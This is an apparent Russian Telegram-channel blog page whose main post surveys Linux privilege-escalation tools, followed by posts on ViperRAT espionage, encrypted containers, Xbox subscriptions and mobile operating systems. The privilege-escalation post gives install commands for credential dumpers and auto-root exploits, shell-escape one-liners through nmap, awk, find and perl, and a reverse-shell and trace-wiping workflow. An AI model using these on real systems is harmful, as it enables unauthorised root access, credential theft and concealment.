Save and Betray

Повышение привилегий в Linux

2019-04-11T19:38:14.991Z

Наш telegram канал : @Save and betray

Эскалация — (повышение привилегий) — это эксплуатация уязвимостей в операционной системе или прикладном ПО, позволяющая получить доступ к ресурсам, которые обычно защищены от определенного пользователя. В результате хакер имеет больше привилегий, чем предполагалось разработчиком или системным администратором, и может выполнять несанкционированные действия в целевой системе.

PXEnum

Основная задача данного скрипта — функция перечисления (англ. Enumeration). Он вытаскивает всю доступную информацию о системе. Скрипт создан для настоящих лентяев. Хорошо, если высказаться более политкорректно, то «для тех, кто ценит свое время». Встроенные команды позволяют также угонять хеши паролей, содержание директорий, все сведения о системе, наличие application-серверов, приложений, соединений, юзеров.

Для запуска скрипта не требуются права root, он работает в стандартном терминале. Перед установкой скачиваем инструмент с помощью Wget:

$ wget https://raw.githubusercontent.com/shawnduong/PXEnum/master/PXEnume.sh

Установка PXEnum:

$ git clone https://github.com/shawnduong/PXEnum.git

$ cd PXEnum/

$ chmod +x PXEnum.sh

$ bash PXEnum.sh

Другой вариант запуска PXEnum:

$ sh PXEnum.sh

MIDA Multitool

Другой интересный инструмент — MIDA Multitool, созданный на базе менее популярных собратьев SysEnum и RootHelper, но предлагающий гораздо больше возможностей.

По воле разработчика MIDA Multitool объединяет в себе отдельные функции своих предшественников, а именно:

SysEnum — Bash-скрипт, предназначенный для получения основной информации о системе, включая следующие данные: текущий пользователь, IP-конфигурация, таблицы ARP, запущенные процессы;
RootHelper — призван помочь в деле эскалации привилегий в системе, которая была скомпрометирована, при помощи выполнения ряда перечислений и использования доверительных сценариев.

Установка MIDA Multitool в систему с GitHub:

$ git clone https://github.com/NullArray/Bash-Kit-Multitool

$ cd Bash-Kit-Multitool

$ chmod +x bashkit.sh

Запускаем скрипта MIDA Multitool :

$ /.bashkit.sh

Вывод некоторой информации по системе:

MimiPenguin

Очень хорошо известный в узких кругах пентестеров скрипт под названием MimiPenguin. Основная задача утилиты — сброс пароля на вход в систему от текущего пользователя Linux (то есть непривилегированного). В некотором роде это аналог утилиты mimikatz для дампа пароля в Windows-системах.

Кроме того, MimiPenguin поддерживает такие приложения, как VSFTPd (активные подключения клиента FTP), Apache 2 (активные/старые сеансы HTTP BASIC AUTH, но для этого требуется Gcore) и OpenSSH-сервер (активные подключения SSH с использованием команды sudo). И вообще, необходимо сказать, что MimiPenguin нередко становится частью эксплоитов под Linux, так что тулза очень и очень востребована.

Установка MimiPenguin с репозитория GitHub:

$ git clone https://github.com/huntergregal/mimipenguin

Если у вас еще не установлен GitHub, то используйте эти команды:

$ apt install git // Debian/Ubuntu systems

$ yum install git // RHEL/CentOS systems

Переходим в директорию MimiPenguin и запускаем скрипт:

$ cd mimipenguin

$ ls –a

$ chmod +x mimipenguin.sh

$ ./mimipenguin.sh

Auto-Root-Exploit

Сингловый скрипт, созданный для одной-единственной цели — получить права root на текущую учетную запись, под которой он был запущен с помощью эксплуатации известных багов. Поддерживает версии ядра, начиная с Linux Kernel 2.6 и до 4.8.0-41-generic, а также часть ОС семейства *BSD.

Установка Auto-Root-Exploit в систему:

$ git clone https://github.com/nilotpalbiswas/Auto-Root-Exploit

$ cd Auto-Root-Exploit

$ chmod +x autoroot.sh

Проверка версии ядра (для того чтобы выбрать нужный эксплоит-пак):

$ uname –a

Использование Auto-Root-Exploit:

$ bash autoroot.sh N

for kernel version 2.6 all

bash autoroot.sh 2

for kernel version 3 all

bash autoroot.sh 3

for kernel version 4 all

bash autoroot.sh 4

for freebsd & openbsd all

bash autoroot.sh bsd

for apple macos all

bash autoroot.sh app

for kernel 2.6,3,4 bsd & app all

bash autoroot.sh all

LARE

И напоследок еще один довольно простой скрипт, который позволяет с помощью использования известных уязвимостей в ядре ОС получать привилегии root удаленно с атакующей машины. Скрипт использует локальные эксплоиты для получения root-прав для версий ядра Linux Kernel v2.6 — v4.8.

Кстати, этот инструмент очень часто находит свое применение в различных War Games и CTF-соревнованиях, например hackthebox.gr, или даже на сертификационном экзамене OSCP.

Устанавка LARE в систему:

$ git clone https://github.com/EnigmaDimitri/LARE && cd LARE

$ chmod +x LARA.sh

Пример локального запуска LARE:

$ LARE.sh -a

или

$ ./LARE.sh -a

Запуск скрипта на целевой машине в сети:

$ LARE.sh -l [Attackers-IP]

Запуск на машине с подключением к базе данных эксплоитов на GitHub:

$ LARE.sh -l or ./LARE.sh -l

Проверка и защита системы от техник постэксплуатации

Кроме традиционных мер, таких как установка патчей и минимизация привилегий, безопасность системы дополнительно обеспечивают специальные утилиты для проверки системы. В противовес популярному мнению (согласно которому к постэксплуатации ведут только зиродеи или устаревший софт) к грандиозному факапу ведут и ошибки конфигурации — предоставление избыточных прав доступа, пароли по умолчанию, системные каталоги и файлы в общем доступе, выключенные опции безопасности в программах, работающих из коробки, и прочие огрехи.

Ниже будут представлены утилиты (скрипты) быстрого анализа системы и проверки ее на факт выполнения несанкционированных и потенциально опасных действий со стороны непривилегированных пользователей.

Bashark

Bashark — популярный скрипт, который помогает пентестерам и исследователям в области информационной безопасности тестить возможности управления системой после успешной эксплуатации.

Фирменные фичи и возможности, заявленные разработчиком:

быстрый запуск, мгновенная реакция;
мультиплатформенность: Unix, OS X, Solaris и другие;
отсутствие зависимостей от версии ядра ОС или установленных пакетов;
иммунитет к эвристическому и поведенческому анализу (обход средств защиты);
встроенные алиасы к популярным командам;
расширение стандартной оболочки bash-командами для постэксплуатации;
процедура заметания следов после завершения работы (Stealthy);
расширяемость — возможность дописывать свои команды и юзать из терминала;
поддержка табуляции при наборе команд.

Итак, качаем скрипт Bashark с помощью Git:

$ git clone https://github.com/TheSecondSun/Bashark.git

Переходим в соответствующую директорию и даем права на выполнение:

$ cd Bashark

$ chmod +x bashark.sh

Запускаем Bashark:

$ ./bashark.sh

В чем еще уникальность Bashark? С помощью опции portscan мы можем сканировать внутреннюю сетку из-под одной скомпрометированной машины. Чтобы получить все файлы конфигурации с другой взломанной машины на Linux, можно использовать опцию getconf. Команда позволяет извлекать все файлы конфигурации, хранящиеся в каталоге /etc. Точно так же легко и просто можно использовать опцию getprem для просмотра всех двоичных файлов на целевой системе.

Сканируем удаленную машину с помощью Bashark:

$ portscan <target’s IP>

Получаем конфиги:

$ getconf

Получаем файлы:

$ getprem

Получаем реверс-шелл:

$ revshell <target’s IP> <Port 31337>

Еще одна приятная мелочь — это фича самоочистки (удаления следов работы в системе). Например, если вы создавали файлы или каталоги во время работы в контексте Bashark с помощью опции -t (создать файл) или -mkd (создать каталог), подпрограмма quit (то есть завершение работы) будет активировать директиву cleanup, затирающую все следы присутствия в системе.

LinEnum

Данный скрипт представляет собой экспресс-тест по таким позициям, как Kernel and distribution release details, System Information, Privileged access, Jobs/Tasks, Services, Default/Weak Credentials, Searches, Platform/software specific tests.

Скрипт LinEnum успешно протестирован на различных версиях дистрибутивов Ubuntu, Debian, Red Hat и CentOS. Программа не ищет и не пытается выполнять эксплоиты, как некоторые другие аналогичные рассмотренные в статье инструменты повышения привилегий в Linux, — она только собирает информацию и делает проверки возможных векторов эскалации привилегий.

Установка LinEnum в систему:

$ git clone https://github.com/rebootuser/LinEnum

$ cd LinEnum/

Простой запуск с вызовом списка ключей:

$ ./LinEnum.sh

Пример запуска LinEnum с опциями (ключами):

$ ./LinEnum.sh -s -k keyword -r report -e /tmp/ -t

Описание ключей LinEnum:

-k — ввести ключевое слово
-e — указать директорию для экспорта отчета
-t — включить в отчет «длинные» тесты (дополнительные тесты)
-s — произвести проверку эскалации текущей учетки sudo perms
-r — задать имя итогового отчета
-h — вызвать встроенную справку по программе
-k — опциональный переключатель, с которым можно указать ключевое слово для поиска файлов по нескольким расширениям

Запуск без опций означает ограниченное сканирование без файла вывода.

LinuxPrivChecker

Еще один полезный в эскалации привилегий скрипт, написанный на Python. Этот инструмент предназначен для локального выполнения в системе с целью перечисления базовой системной информации и поиска общих векторов повышения привилегий, таких как общедоступные файлы, неверные конфигурации демонов и библиотек, пароли, хранимые в виде открытого текста, и баги, соответствующие наиболее популярным эксплоитам.

Основные области проверки:

основная информация о системе (ОС, ядро, имя системы и так далее);
информация о сети (ifconfig, route, netstat и т. д.);
разная информация о файловой системе (mount, fstab, cron jobs);
информация о пользователе (текущий пользователь, все пользователи, суперпользователи, история команд);
права доступа к файлам и каталогам (доступные для записи файлы/каталоги, файлы suid, корневой домашний каталог);
файлы, содержащие незашифрованные пароли;
интересные файлы, процессы и приложения (все процессы и пакеты, все процессы, запускаемые пользователем root и связанные пакеты, версия sudo, файл конфигурации Apache);
все установленные языки и инструменты (GCC, Perl, Python, Nmap, Netcat, Wget, FTP и так далее);
все соответствующие эксплоиты повышения привилегий (с использованием базы данных эксплоитов с применимыми версиями ядра, пакетами/процессами программного обеспечения).

Проверка на эскалацию привилегий производится в следующих программах:

nmap

-interactive

:!bash

:set shell=/bin/bash:shell

awk

awk ‘BEGIN {system(“/bin/bash”)}’

find

find / -exec /usr/bin/awk ‘BEGIN {system(“/bin/bash”)}’ \;

perl

perl -e ‘exec “/bin/bash”;’

Итак, качаем скрипт LinuxPrivChecker:

$ wget http://www.securitysift.com/download/linuxprivchecker.py

Запускаем LinuxPrivChecker с помощью всего лишь одной команды:

$ chmod +x linuxprivchecker.py

$ ./linuxprivchecker.py

Или другой вариант запуска LinuxPrivChecker:

$ python linuxprivchecker.py

Unix-privesc-check

Unix-privesc-checker — это мощный скрипт, работающий в Unix-системах (протестирован на Solaris 9, HPUX 11, различных Linux 3.х и FreeBSD 6.2+). После запуска скрипт пытается найти неправильные твики конфигурации системы, процессы, которые могут позволить локальным непривилегированным пользователям повышать привилегии других юзеров или получать доступ к локальным приложениям, например базам данных MySQL.

Основные области проверки:

слабые пароли и значения по умолчанию;
конфигурация стека IP (без ненужного использования IPv6, без форвардинга IP-пакетов и так далее);
некорректные права доступа к файлам (чтение/изменение конфиденциальных данных);
настройка локальных приложений (просмотр sshd_config, httpd.conf);
другие полезные вещи (например, удаленное ведение журнала, использование небезопасных протоколов TCP/IP).

Основное внимание разработчики данного скрипта уделяют проверке на предмет распространенных ошибок в конфигурации системы и некорректно настроенных разрешений на доступ к директориям и файлам. Важно отметить, что скрипт не проверяет наличие отсутствующих патчей для ядра ОС или установленных пакетов, но это и не его задача, ведь для ее решения существуют более сложные утилиты, о которых мы рассказывали в нашем предыдущем материале про аудит Linux.

Скрипт может запускаться как от имени обычного пользователя, так и от имени root. В последнем случае у скрипта больше привилегий и он может выполнить ряд тестов, недоступных из-под учетной записи непривилегированного пользователя. Для регулярного мониторинга запуск скрипта можно прописать как задание cron.

Пример запуска скрипта Unix-privesc-check:

$ ./unix-privesc-check > output.txt

Хакеры использовали вредоносное ПО, чтобы шпионить за Израильскими Военнослужащими

2019-04-09T13:00:24.167Z

Наш telegram канал : @Save and betray

Вступай в наши ряды

Как военнослужащие смогли допустить такое?

По данным антивирусных компаний, сотрудники Армии обороны Израиля были взломаны с помощью методов, всеми нами любимой социальной инженерии — где солдаты были прикормлены через мессенджер Facebook и других социальных сетях. Хакеры, выдавали себя за привлекательных женщин из разных стран, как Канада, Германия и Швейцария,Мехико.

Далее «девушки» отказывались, продолжать диалог в соц. сетях, под предлогом, что мол «не удобно ей писать, через Facebook» или же «нету возможности писать через соц сети». Им скидывали приложения, под видом SR Chat. А те же, с удовольствием, не думая скачали приложение, лишь бы продолжить диалог с сочной латинкой(например).

Вредоносная программа также распространяется с помощью «капельницы», скрытая в других приложениях на Android, включая игры в бильярд, израильские Песни, и переход к iOS-приложения, которые являются общими для израильских граждан и доступна в магазине Google Play.

Затем, сразу же приходило уведомление обновления для одного из уже установленных приложений, таких как whatsapp.

Это, в свою очередь, позволило злоумышленникам выполнить по командам спрос, позволяя им контроль микрофон и камеры телефона, подслушивать разговоры солдат, и смотреть видео с камер.

Кроме этого, ViperRAT (вредоносная программа) собирает широкий спектр данных с вашего устройства, включая геолокацию, журнал звонков, личные фотографии, SMS-сообщения, информацию, сотовую связь, мобильный интернет, метаданные устройства, просмотр интернет-страниц, и история скаченных приложений.

По данным исследователей, хакеры смогли успешно создать широкую кампанию кибер шпионажа, приносящая ущерб десяткам мобильным устройствам от Samsung, HTC, LG и Huawei, принадлежащих к более чем 100 израильских солдат.

ViperRAT атаки начались в июле и продолжаются по сей день, по мнению исследователей из Лаборатории Касперского.

Азы безопасности: шифрование данных

2019-04-08T14:36:52.170Z

Наш telegram канал : @Save and betray

Вступай в наши ряды

Переход к использованию криптоконтейнеров

В рамках этой статьи поговорим о практике использования шифрования для защиты данных. Если вам пока сложно воспринимать слово криптоконтейнер, читайте вместо него «надёжно зашифрованная папка с паролем, где можно хранить и редактировать файлы». Криптоконтейнер — это надежный сейф внутри вашего компьютера.

Я на своем примере расскажу о начале применения криптоконтейнеров, а вы, опираясь на мой опыт, настроите работу криптоконтейнеров на компьютере или мобильном устройстве. Как у многих из вас, файлы у меня были разложены по папкам.

Я всегда пытался навести порядок на своем компьютере: у меня была папка «Работа» с множеством вложенных папок, была папка «Учёба» с образовательными материалами, были различные папки с фотографиями, видео и всяким хламом. Была, конечно, и папка XXX, предусмотрительно переименованная в «Лекции».

Общий объём файлов составлял порядка 112 ГБ. При переходе к использованию криптоконтейнеров я разделил файлы на три группы.

В первую группу вошли очень ценные для меня файлы, но которые я не использую ежедневно. Во вторую вошли важные файлы, которые используются мной каждый день для работы или учебы. В третью вошёл всякий хлам, который я даже не думал как-то защищать и перенёс в криптоконтейнер только ради общего порядка. Есть одно общее правило: чем меньше у вас файлов в криптоконтейнере, тем лучше с точки зрения безопасности. Когда вы монтируете криптоконтейнер, в котором лежит десять файлов, то открываете доступ ко всем десяти из-за одного. В идеале на каждый файл должен быть отдельный криптоконтейнер, но на практике это несбыточная утопия. Когда файлы находятся в несмонтированном криптоконтейнере, они надёжно защищены. Забросят ли вам на компьютер трояна или, вынеся дверь, проведут криминалистический анализ — всё это бесполезно при надёжном пароле. Если, конечно, вы сами не выдадите его, или он у вас не сохранен в txt документе на рабочем столе. О способах взлома криптоконтейров мы подробно расскажем в заключительном параграфе.

Думаю, стоит детальнее объяснить, что такое смонтированный криптоконтейнер. Представьте, что криптоконтейнер — это зашифрованная папка с паролем. Вы ввели пароль и пользуетесь находящимися там файлами, потом вы закрыли папку, и для доступа к данным снова нужен пароль. В состоянии, когда вы пароль уже ввели, и доступ открыт, троянская программа, попавшая на ваш компьютер, или третье лицо, получившее доступ к компьютеру, имеют доступ и к файлам. Это называется смонтированным криптоконтейнером, а сам процесс введения пароля и открытие доступа — монтирование. Криптоконтейнер можно сравнить с сейфом. Сейф защищён, только когда закрыт. В открытом состоянии любой может получить доступ к его содержимому. Хранить вещи в открытом сейфе ничуть не безопаснее, нежели на столе рядом с ним.

Совет: создавайте как можно больше криптоконтейнеров. Хранить все данные в одном криптоконтейнере небезопасно. Вернёмся к моим криптоконтейнерам. Я создал криптоконтейнеры, создал резервную копию файлов (на всякий случай) и перенёс файлы в созданные криптоконтейнеры. Весь хаос папок и файлов на моём жёстком диске преобразовался в три надёжно зашифрованных файла. Всё просто: вы продумываете, сколько криптоконтейнеров вам понадобится, создаёте их и переносите в них файлы. Перенос данных в криптоконтейнеры — один из важнейших шагов на пути к построению защищённой системы.

Совет: храните всю информацию только в криптоконтейнерах. У криптоконтейнера есть ещё одно преимущество. Например, вам надо экстренно уничтожить ваши данные, занимающие 100 ГБ жесткого диска. Сколько времени будет происходить удаление их безопасным способом? В зависимости от возможностей жёсткого диска это может занять до 30 минут.

А если эти 100 ГБ будут в криптоконтейнере, то с помощью технологии CryptoCrash данные можно уничтожить за несколько секунд. В следующих параграфах мы познакомим вас с программами, позволяющими создавать и использовать криптоконтейнеры.

История TrueCrypt

TrueCrypt — почти образцовая программа шифрования папок и файлов. Первая версия программы вышла в свет ещё в далеком 2004 году, и на тот момент TrueCrypt оказалась фактически единственной программой с открытым исходным кодом для шифрования «на лету». Что значит «на лету»? Обычные программы для работы с зашифрованными файлами требуют сначала расшифровать файл или папку, выполнив необходимые манипуляции с данными, затем создать зашифрованную копию файла или папки, а незашифрованный оригинал удалить. TrueCrypt позволяла создавать зашифрованную папку, указав в программе пароль, и работать с зашифрованной папкой, шифруя и расшифровывая данные «на лету». С 2004 по 2014 программа TrueCrypt регулярно обновлялась. Некоторые функции исключались. Так, например, была убрана поддержка дискет, когда этот формат канул в лету, удалялись и некоторые протоколы шифрования.

С развитием компьютерной индустрии совершенствовались и технологии взлома методов шифрования, из-за этого ряд протоколов перестал считаться надёжным. Так, в последней, 7-й, версии TrueCrypt вы уже не увидите протоколов шифрования с размером блока в 64 бита (Тройной DES, Blowfish, CAST5).

Десять лет проект TrueCrypt активно развивался и превратился в фундаментальный софт для защиты данных. Всё это время имена разработчиков программы оставались загадкой, что породило ряд слухов о причастности спецслужб к разработке приложения.

Некоторые говорили, что программа разработана ФБР, другие утверждали, что если и не ФБР, то в софте непременно есть закладки. Популярность TrueCrypt росла, пока весной 2014 года не произошло необъяснимое событие, повергшее интернет-общественность в шок. 28 мая 2014 проект TrueCrypt был закрыт. Точные причины закрытия проекта никому не известны по сей день. Сами разработчики сообщили на официальном сайте, что использование TrueCrypt небезопасно, и предложили переходить на BitLocker, который всегда высмеивали. Есть много версий и догадок о случившемся, мы приведём основные.

Первая версия гласит, что разработчикам угрожали спецслужбы, вторая — что их переманили на работу в Microsoft, чем и объясняется реклама BitLocker, третья — им надоело продвигать и поддерживать проект, не приносящий денег, четвертая — они действительно обнаружили в продукте критическую уязвимость, которую не способны были исправить. Интернет-сообщество погрузилось в споры о безопасности TrueCrypt, и одному Богу известно, сколько бы они продлились, если бы к началу апреля 2015 не был завершен независимый аудит TrueCrypt, на который было собрано свыше 60 000 USD пожертвований. Он не выявил никаких уязвимостей или серьёзных недостатков в архитектуре приложения и показал, что TrueCrypt является хорошо спроектированной криптографической программой. Источник: здесь. Мы считаем, что, TrueCrypt 7.1 надежен, и закрытие проекта не связано с его безопасностью. А вот хронологически последняя версия программы (7.2) не является безопасной и полнофункциональной, по крайней мере, об этом предупреждают сами разработчики, и это мнение разделяют многие эксперты.

Потому мы рекомендуем использовать последнюю стабильную и надежную версию — TrueCrypt 7.1а. TrueCrypt

Недоказуемость криптоконтенейра

У TrueCrypt масса преимуществ, одно из которых заключается в невозможности идентифицировать зашифрованный контейнер. Даже если недоброжелатели получат доступ к вашему диску, укажут на криптоконтейнер и скажут «это — криптоконтейнер», вы смело можете сказать, что это не так, что это какой-то неизвестный вам файл. Доказать обратное невозможно. Разумеется, вы можете «случайно» прищемить палец дверью и тогда не только признаете в файле криптоконтейнер, но и вспомните пароль. Но и от этого есть защита, о которой мы расскажем в главе, посвященной антикриминалистике, а сейчас просто запомните, что доказать наличие криптоконтейнера исследованием файла невозможно. Опираясь на это, мы рекомендуем вам называть свои контейнеры как-нибудь нейтрально и пробовать их маскировать под программные файлы. Например, открываем у себя папку с менеджером паролей KeePassX и видим какие-то непонятные файлы с расширением *.dll. Создавая криптоконтейнер, назовем его LsQN7.dll и положим в эту папку. Только мы будем знать, что LsQN7.dll на самом деле криптоконтейнер. После создания криптоконтейнера и размещения его в папке KeePassX. Вы видите отличия? Только дата? Менять дату мы вас научим в части, посвященной маскировке криптокойнтейнеров. Но не спешите создавать криптоконтейнер. Совет Называйте криптоконтейнеры так, чтобы название не выдавало криптоконтейнер. Указывайте у криптоконтейнеров расширение *.dat и размещайте в папке с другими файлами с расширением *.dat.

Хотим предупредить, что наличие на рабочем компьютере TrueCrypt действует на некоторых недоброжелателей, как красная тряпка на быка. У вас сразу начинают искать криптоконтейнеры, требовать пароли, а вам приписывать различные криминальные намерения от торговли ПАВ до поддержки международного терроризма.

VeraCrypt

Вот уже четыре года как проект TrueCrypt — легендарный софт для шифрования данных — не поддерживается разработчиками. Но TrueCrypt — программа с открытым исходным кодом, и любой на его основе может начать разрабатывать свой продукт. Именно так поступил француз Мунир Идрасси, летом 2013 представив миру проект VeraCrypt. Основной идей было создание более безопасного, чем TrueCrypt, решения. Например, в TrueCrypt использовалась довольно посредственная генерация ключа, по мнению экспертов, не способная обеспечить высокий уровень защиты против имеющихся в арсенале спецслужб компьютерных мощностей.

VeraCrypt предложил ощутимо более устойчивое против брутфорса решение, о котором мы подробнее расскажем, когда дойдем до сравнения программ. При «живом» TrueCrypt форки не пользовались популярностью; все изменилось, когда весной 2014 года разработчики TrueCrypt сообщили о прекращении поддержки проекта. Тогда о VeraCrypt заговорили как о надежной альтернативе TrueCrypt (хотя были и другие форки, такие как GostCrypt, CipherShed например). Часть пользователей TrueCrypt сразу перешла на использование VeraCrypt, а часть осталась верна TrueCrypt.

Многим понравился VeraCrypt, однако нашлось и немало критиков. В сети активно поддерживалась версия, что VeraCrypt — проект спецслужб, имеющий закладки. Многие относятся к форкам с большой долей скептицизма, этого же мнения придерживаются и разработчики TrueCrypt, считая форк опасным. В основе их опасения лежит убеждение в неспособности сторонних разработчиков до конца разобраться с их кодом, и, как вы узнаете дальше, эти опасения были не напрасны.

VeraCrypt vs TrueCrypt

Давайте сравним TrueCrypt и VeraCrypt. Эти программы очень близки по функционалу и дизайну, что неудивительно для форка и оригинала, потому мы сравним быстродействие и безопасность. Скорость монтирования криптоконтейнеров.

Первый негативный момент, с которым сталкиваются пользователи TrueCrypt, первый раз попробовав VeraCrypt, — время монтирования криптоконтейнера. Когда в TrueCrypt вы указываете верный пароль, время ожидания до доступа к зашифрованным данным составляет на современном компьютере десятые доли секунды. При использовании VeraCrypt ждать приходится заметно дольше. TrueCrypt vs VeraCrypt

Устойчивость к брутфорсу

Брутфос, если говорить простыми словами, — попытка подобрать пароль (ключ) путем перебора всех возможных вариантов. Современные суперкомпьютеры, имеющиеся в распоряжении спецслужб, умеют перебирать варианты очень быстро. За счёт более совершенного метода генерации ключей VeraCrypt от 10 до 300 раз более устойчив к атакам прямого перебора. Для многих это самое главное преимущество VeraCrypt. Поддержка со стороны разработчиков. TrueCrypt уже не поддерживается разработчиками, используемые решения устаревают с каждым днем, потенциальные уязвимости не исправляются. Это безусловно плюс для VeraCrypt, который активно поддерживается и развивается.

TrueCrypt vs VeraCrypt: уязвимости

Казалось бы, наличие поддержки со стороны разработчиков должно было обеспечить VeraCrypt преимущество, но на самом деле все наоборот. В главе, посвященной TrueCrypt, мы рассказывали о проведенном аудите программы, который не выявил критических уязвимостей. Подобному аудиту было подвергнуто и программное обеспечение VeraCrypt. По результатам аудита были выявлены 36 уязвимостей, 8 из которых получили статус критических, 3 — умеренных и 15 — незначительных. 8 критических уязвимостей в таком приложении нельзя назвать иначе как катастрофа. С полной версией отчета об аудите вы можете познакомиться по этой ссылке. В настоящий момент большинство обнаруженных уязвимостей успешно исправлены, однако некоторые из них требуют существенной переработки архитектуры и до сих пор присутствуют в VeraCrypt.

TrueCrypt vs VeraCrypt: уровень команды разработчиков

Как было сказано ранее, аудит VeraCrypt обнаружил 8 критических уязвимостей, а при аудите TrueCrypt не было обнаружено ни одной. Это вызывает опасения по поводу уровня команды разработчиков VeraCrypt. У нас нет никаких сомнений, что программное обеспечение TrueCrypt разрабатывалось более компетентными специалистами.

Допустим, обнаруженные в ходе аудита 8 критических уязвимостей в VeraCrypt будут закрыты, но где гарантии, что команда разработчиков не допустит еще столько же новых критических уязвимостей? TrueCrypt vs VeraCrypt А какую программу выберете вы?

В нашем противостоянии победил TrueCrypt. Но не все так просто. Вы сами должны все взвесить и принять решение. С одной стороны, TrueCrypt использует устаревающие технологии, уступающие в криптостойкости технологиям VeraCrypt. К тому же TrueCrypt больше не поддерживается разработчиками. С другой стороны, VeraCrypt постоянно обновляется и поддерживает более устойчивые к атакам технологии, но обнаруженные уязвимости и вопросы по поводу уровня команды разработчиков дают повод серьезно задуматься. В группе нашей редакции единого мнения нет, но есть единое решение — параллельное использование двух инструментов. Проще говоря, вы создаете один криптоконтейнер, например, при помощи программного обеспечения TrueCrypt, внутри него создаете второй криптоконтейнер при помощи VeraCrypt и уже в нем размещаете файлы. Такая связка в разы надежнее каждой из программ в отдельности.

Microsoft может объединить подписки Xbox Live и Game Pass в одну общую

2019-04-07T18:25:58.350Z

У Microsoft на сегодняшний день есть два варианта подписок на игры Xbox — Live Gold и Game Pass. Первая предоставляет возможность играть в многопользовательские игры, доступные на консоли. Также для владельцев «Золотого статуса» доступны 2–4 бесплатных игры ежемесячно. Вторая подписка за ежемесячный взнос предоставляет доступ к обширной библиотеке игр (более сотни на данный момент). Из проектов, недавно добавленных в ассортимент, можно отметить Sea of Thieves и Minecraft.

engadget.com

Но теперь сообщается, что компания в скором времени может представить новую подписку Xbox Game Pass Ultimate, которая объединит оба варианта и будет стоить $15 в месяц (цена в России пока не объявлена). Источником выступает инсайдер WalkingCat, который известен своими утечками из внутренней «кухни» Microsoft.

По его словам, участники программы раннего доступа могут получить особую цену на подписку — $1 в месяц вплоть до запуска сервиса.

Есть косвенные подтверждения этой информации. Во-первых, аналитик Дэниел Ахмад (Daniel Ahmad) заявил в обсуждении на Resetera, что компания из Редмонда хочет сделать подписки важным элементом своего бизнеса.

Во-вторых, ранее появилась информация о сроках выхода Xbox One S All-Digital без дисковода. Такое устройство чисто физически сможет загружать игры только из Сети (ну или с флешек, если хакеры смогут взломать прошивку). Как полагают наблюдатели в отрасли, такая консоль будет дешевле обычной. Также не стоит забывать о потоковом сервисе xCloud, который может быть анонсирован на E3 в начале лета. Хотя его и позиционируют как универсальное решение, с помощью которого можно играть на всех устройствах, очевидно, что Xbox One S All-Digital будет первой на очереди.

7 мобильных ОС с открытым исходным кодом: могут ли они составить конкуренцию Android?

2019-04-06T20:32:52.285Z

Наш telegram канал : @Save and betray

Вступай в наши ряды

Лучшие альтернативы Android с открытым исходным кодом

1. Kai OS

Вы знали, что Kai OS претендует на то, чтобы стать третьей крупнейшей мобильной операционной системой в мире? Скорее всего, нет. Что ж, это неудивительно. KaiOS вышла на рынок не так давно — в 2017 году — но за неполные два года стала платформой для огромного количества мобильных телефонов. В чем тут секрет? В отличие от других операционных систем, Kai OS «заточена» не под смартфоны, а под фичерфоны — классические сотовые телефоны, оснащенные продвинутыми опциями. Низкая цена в сочетании с функционалом, присущим «умным» телефонам, обеспечивает фичерфонам достаточно большую популярность.

Будучи форком канувшей в лету Firefox OS (см. ниже), Kai OS также базируется на ядре Linux.Оценить потенциал Kai OS можно по тому факту, что недавно Google инвестировал в эту операционную систему 22 миллиона долларов.

2. Tizen

Опенсорсная мобильная операционная система Tizen поддерживается сообществом Linux Foundation, из-за чего ее часто называют официальной мобильной ОС Linux. Помимо Linux Foundation, Tizen также поддерживают такие техногиганты, как Samsung и Intel. Релиз первого смартфона с ОС Tizen, Samsung Z, состоялся в январе 2015 года (хотя изначально был запланирован на конец 2013-го) на южно-азиатском рынке. К сожалению, большого успеха на рынке Индии Samsung Z не снискал.

Несмотря на то, что операционная система Tizen базируется на ядре Linux, в ней не раз обнаруживали уязвимости. Честно говоря, в будущее данной ОС верится с трудом. Похоже, что рано или поздно Tizen себя изживет.

3. Plasma Mobile

В 2015 году разработчики рабочего стола KDE создали мобильную операционную систему с открытым исходным кодом Plasma Mobile. Приложение основано на ОС Kubuntu и по сути является мобильной версией десктопного пользовательского интерфейса Plasma. При этом Plasma Mobile совместима и с другими операционными системами.

Plasma Mobile работает на Nexus 5 и OnePlus One. Мобильная ОС поддерживает виджеты KDE Plasma и позволяет загружать настольные приложения на смартфоне.

4. postmarketOS

postmarketOS (сокращенно pmOS) — это предконфигурированная и оптимизированная для сенсорного управления операционная система на базе Alpine Linux с собственными программными пакетами, которые можно устанавливать на смартфоны.

Известно, что Android и iOS перестают выпускать обновления для моделей спустя несколько лет. В то же время Linux без проблем работает и на старых компьютерах. Цель postmarketOS — внедрить данный опыт и на мобильной платформе, обеспечив смартфонам 10-летний жизненный цикл.

В настоящее время проект находится на стадии разработки, поэтому воспользоваться преимуществами postmarketOS прямо сейчас, скорее всего, не получится.

5. Librem

Librem — это даже не мобильная операционная система, а безопасный зашифрованный мобильный телефон с открытым исходным кодом, который разработчики Linux-дистрибутива PureOS планируют вывести на рынок в ближайшее время.

Устройство получит оптимизированную для сенсорного управления версию PureOS, Debian, Ubuntu, SUSE, Fedora и даже Arch Linux.

Librem позиционируется как «телефон, по умолчанию ориентированный на безопасность и конфиденциальность». Смартфон работает на свободном и открытом программном обеспечении, на операционной системе GNU+Linux, и его миссия состоит в том, чтобы «создать утопию свободной разработки в противовес огороженным садам других телефонных провайдеров». Будем наблюдать, удастся ли затея.

6. LineageOS

LineageOS — это дистрибутив Android, иначе говоря, — пользовательская прошивка. Операционная система пришла на смену гораздо более успешному Android-дистрибутиву CyanogenMod и является его форком.

Выпущенная в декабре 2016 года, на сегодняшний день LineageOS поддерживает 178 моделей смартфонов, а количество установок операционной системы, по словам разработчиков, достигло 1,7 миллионов.

7. /e/ (eelo)

/e/ (ранее eelo) — это Android-дистрибутив на основе LineageOS от разработчика Mandrake Linux. Цель проекта — создать не привязанную к Google мобильную операционную систему с открытым исходным кодом. Предполагается, что у ОС будет собственное облако и email-сервис. Платформа /e/ должна появиться в стабильной версии в ближайшее время. Название проекта планируется снова изменить.

Sailfish OS [закрытый исходный код]

Когда компания Nokia отказалась от разработки мобильной ОС MeeGo, часть сотрудников решила спасти проект. Предполагалось, что MeeGo будет развивать сообщество Linux Foundation в рамках проекта Tizen, однако последний получил самостоятельное развитие и перестал ассоциироваться с MeeGo. Продолжением MeeGo считается Sailfish OS. В ее основу легла операционная система Mer, ставшая ответвлением MeeGo.

Первыми устройствами на базе Sailfish OS стали смартфоны Jolla, получившие горячую поддержку поклонников Nokia. Сегодня данную операционную систему официально поддерживает более десяти мобильных устройств. Хотя Sailfish OS имеет закрытый исходный код, ее вполне можно рассматривать, как альтернативу Android, iOS и Windows.

